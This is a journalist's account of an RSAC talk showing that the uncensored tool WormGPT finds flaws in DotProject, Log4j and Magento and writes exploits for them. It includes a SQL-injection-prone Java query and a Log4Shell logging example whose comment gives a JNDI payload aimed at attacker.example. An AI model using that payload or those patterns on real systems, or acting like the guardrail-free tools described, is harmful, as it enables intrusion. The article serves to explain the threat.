On the top floor of San Francisco’s Moscone convention center, I’m sitting in a single row of many chairs, most already full. It’s the start of a day at RSAC’s annual cybersecurity conference, and still early in the week. When the presenters take the stage, their attitude is briskly professional but energetic.
I’m expecting a technical dive into general AI tools: something that gives an up-close look at how ChatGPT and its rivals are manipulated for dirty deeds. Sherri Davidoff, Founder and CEO of LMG Security, reinforces this belief with her opener about software vulnerabilities and exploits.
But then Matt Durrin, Director of Training and Research at LMG Security, drops an unexpected phrase: “Evil AI.”
Cue a subtle record scratch in my head.
“What if hackers can use their evil AI tools that don’t have guardrails to find vulnerabilities before we have a chance to fix them?” Durrin says. “[We’re] going to show you examples.”
And not just screenshots, though as the presentation continues, plenty of those illustrate the points made by the LMG Security team. I’m about to see live demos, too, of one evil AI in particular: WormGPT.
LMG Security / RSAC Conference
Davidoff and Durrin start with a chronological overview of their attempts to gain access to rogue AI. The story ends up revealing a thread of normalcy behind what most people think of as the dark, shadowy corners of the internet. In some ways, the session feels like a glimpse into a mirror universe.
Durrin first describes a couple of unsuccessful attempts to access an evil AI. The creator of “Ghost GPT” ghosted them after receiving payment for the tool. A conversation with DevilGPT’s developer made Durrin uneasy enough to pass on the opportunity.
What have we learned so far? Most of these dark AI tools have “GPT” somewhere in their name to lean on the brand strength of ChatGPT.
The third option Durrin mentions bore fruit, though. After hearing about WormGPT in a 2023 Brian Krebs article, the team dove back into Telegram’s channels to find it, and successfully got their hands on it for just $50.
“It is a very, very useful tool if you’re looking at performing something evil,” says Durrin. “[It’s] ChatGPT, but with no safety rails in place.” Want to ask it something? You really can, even if it’s harmful or dangerous.
That knowledge isn’t too unsettling yet, though. The proof is in what this AI can do.

LMG Security
Durrin and Davidoff start by walking us through their experience with an older version of WormGPT from 2024. They first tossed it the source code for DotProject, an open-source project management platform. It correctly identified a SQL vulnerability and even suggested a basic exploit for it, which didn’t work. As it turns out, this older form of WormGPT couldn’t capitalize on the weaknesses it spotted, likely due to its inability to ingest the full set of source code.
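DotProject is a PHP application, so the snippet below isn’t its actual code. It’s only a minimal, hypothetical Java sketch of the class of flaw being described, the kind of pattern a scanner (or WormGPT) flags as SQL injection; the `ProjectLookup` class and `projects` table are invented for illustration:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class ProjectLookup {

    // Vulnerable: user input is concatenated straight into the query string,
    // so input like "0 OR 1=1" (or a UNION-based payload) rewrites the SQL itself.
    public ResultSet findProject(Connection conn, String projectId) throws SQLException {
        Statement stmt = conn.createStatement();
        return stmt.executeQuery("SELECT * FROM projects WHERE id = " + projectId);
    }

    // Safe: a PreparedStatement binds the input as data, never as SQL.
    public ResultSet findProjectSafely(Connection conn, int projectId) throws SQLException {
        PreparedStatement ps = conn.prepareStatement("SELECT * FROM projects WHERE id = ?");
        ps.setInt(1, projectId);
        return ps.executeQuery();
    }
}
```

Spotting that pattern is the easy half; the team’s point is that the older WormGPT could find it but couldn’t yet turn it into a working exploit.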
Not good, but not spooky.
Next, the LMG Security team ramped up the difficulty with the Log4j vulnerability, setting up an exploitable server. This version of WormGPT, which was a bit newer, found the remote execution vulnerability present: another success. But again, it fell short in its explanation of how to exploit it, at least for a beginner hacker. Davidoff says “an intermediate hacker” could work with this level of information.
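The session doesn’t share the test server’s code, but the underlying bug (Log4Shell, CVE-2021-44228) is well documented. As a hedged sketch, assuming a typical Java backend, the vulnerable pattern is nothing more than an ordinary log line that records user input; the `LoginHandler` class and the LDAP URL here are invented for illustration:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    public void recordFailedLogin(String username) {
        // On Log4j 2.0-beta9 through 2.14.1, logging attacker-controlled input
        // is enough: a "username" like ${jndi:ldap://attacker.example/a} makes
        // the logger perform a JNDI lookup, fetching and running remote code.
        logger.info("Failed login attempt for user: {}", username);
    }
}
```

That’s what makes the bug so notorious: the flaw isn’t in any one developer’s logic, it’s in a log statement nearly every Java application has.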
Not great, but a knowledge barrier still exists.

Newer versions of WormGPT can explain to novice hackers exactly how to pwn a server with a Log4j vulnerability.
LMG Security / RSAC Conference
But another, newer iteration of WormGPT? It gave detailed, explicit instructions for how to exploit the vulnerability, and it even generated code incorporating the sample server’s IP address. And those instructions worked.
Okay, that’s…bad?
Finally, the team decided to give the latest version of WormGPT a harder task. Its updates blow away many of the early variant’s limitations; you can now feed it an unlimited amount of code, for starters. This time, LMG Security simulated a vulnerable e-commerce platform (Magento) to see if WormGPT could find the two-part exploit.
It did. But tools from the good guys didn’t.
SonarQube, an open-source platform that looks for flaws in code, caught only one potential vulnerability… but it was unrelated to the issue the team was testing for. ChatGPT didn’t catch it, either.
On top of this, WormGPT can give a full rundown of how to hack a vulnerable Magento server, with explanations for each step, and quickly too, as I see during the live demo. It even offers the exploit unprompted.
As Davidoff says, “I’m a little nervous to see where we’re going to be with hacker AI tools in another six months, because you can just see the progress that’s been made right now over the past year.”

LMG Security’s recap of where AI hacker tools started, where they are now, and what we’re facing in the future.
LMG Security / RSAC Conference
The experts here are far calmer than I am. I’m remembering something Davidoff said at the beginning of the session: “We are actually in the very early infant stages of [hacker AI].”
Well, f***.
This moment is when I realize that, as purpose-built tools, WormGPT and similar rogue AIs have a head start in both sniffing out and capitalizing on code weaknesses. Plus, they lower the bar for getting into successful hacking. Now, as long as you have money for a subscription, you’re in the game.
On the other side, I start wondering how constrained the good guys are by their ethics, and by their general mindset. The common talk around AI is about the betterment of society and humanity, rather than how to protect against the worst of humanity. As Davidoff pointed out during the session, AI should be used to help vet code, to help catch vulnerabilities before dark AI does.
This situation is a problem for us end users. We are the soft, squishy masses; we’re the ones who still pay (sometimes literally) when the systems we rely on daily aren’t well-defended. We have to deal with the messy aftermath of scams, compromised credit cards, malware, and more.
The only silver lining in all this? Those in the shadows typically don’t look too hard at anyone else there with them. Cybersecurity experts should still be able to research and analyze these hacker AI tools, and ultimately improve their own methodologies.
In the meantime, you and I have to focus on how to minimize the splash damage whenever a service, platform, or website becomes compromised. Right now that takes many different tricks: passkeys and unique, strong passwords to protect accounts (and password managers to store them all); two-factor authentication; email masks to hide our real email addresses; trustworthy antivirus on our PCs; a VPN to ensure privacy on open or otherwise unsecured networks; temporary credit card numbers (if available to you through your bank); credit freezes; and still more.
It’s a pain in the butt, but unfortunately so necessary. And it seems like that’s only going to become more true, for now.